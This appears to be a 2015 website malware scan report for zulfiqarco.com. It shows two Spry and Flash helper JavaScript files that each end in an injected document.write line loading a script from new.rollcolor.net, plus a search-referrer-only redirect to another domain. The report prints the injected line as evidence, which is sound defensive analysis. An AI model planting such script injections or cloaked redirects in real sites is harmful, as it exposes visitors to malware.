Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zulfiqarco.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zulfiqarco.com/ | 200 OK Content-Length: 10988 Content-Type: text/html | clean |
http://zulfiqarco.com/SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 10149 Content-Type: application/x-javascript | malicious |
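Malicious code - confirmed by antiviruses (see below). The excerpt shows the beginning and the end of the file; the middle is not shown. The statement that matters is the last one: a document.write call that makes every page including this file load a script from new.rollcolor.net. It appears to have been appended to otherwise ordinary Spry menu bar code, and the identical statement ends the excerpt of AC_RunActiveContent.js.
var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera [... middle of file not shown ...] if(!listitem.contains(related)) { clearTimeout(opentime); self.currMenu = listitem; self.removeClassName(link, hasSubMenu ? "MenuBarItemSubmenuHover" : "MenuBarItemHover"); if(menu) { closetime = window.setTimeout(function(){self.hideSubmenu(menu);}, 600); } } }, false); }; document.write('<script src=http://new.rollcolor.net/table/index.php ><\/script>');
Antivirus reports: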
| ||
http://zulfiqarco.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8406 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shows the beginning and the end of the file; the middle is not shown. As in SpryMenuBar.js, the final document.write statement loads a script from new.rollcolor.net and appears to have been appended to the end of the original file. Because the same line is present in more than one script, every other .js file on the site should be checked for it as well.
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { [... middle of file not shown ...] case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<script src=http://new.rollcolor.net/table/index.php ><\/script>');
Antivirus reports:
| ||
http://new.rollcolor.net/table/index.php | 200 OK Content-Length: 103 Content-Type: text/html | clean |
http://new.rollcolor.net/test404page.js | 500 Internal Server Error Content-Length: 672 Content-Type: text/html | clean |
Malicious/Suspicious Redirects
Request | Server response | Status |
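URL: http://zulfiqarco.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: zulfiqarco.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 17 Jan 2015 08:01:04 GMT Location: http://recover8888.com/ek/index.php?s=7c70dd9f78bb703a31cb4cb8734fb431 Server: Microsoft-IIS/7.0 Content-Length: 256 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin | suspicious |
Note: the same URL returned 200 OK in the "Scanned pages/files" table above, so the redirect appears to be conditional on the search-engine Referer and would not be seen by someone who opens the site directly. The 302 is issued by the web server itself, separately from the script injection in the two .js files, so cleaning those files alone is unlikely to remove it; the server-side code and configuration need to be reviewed as well.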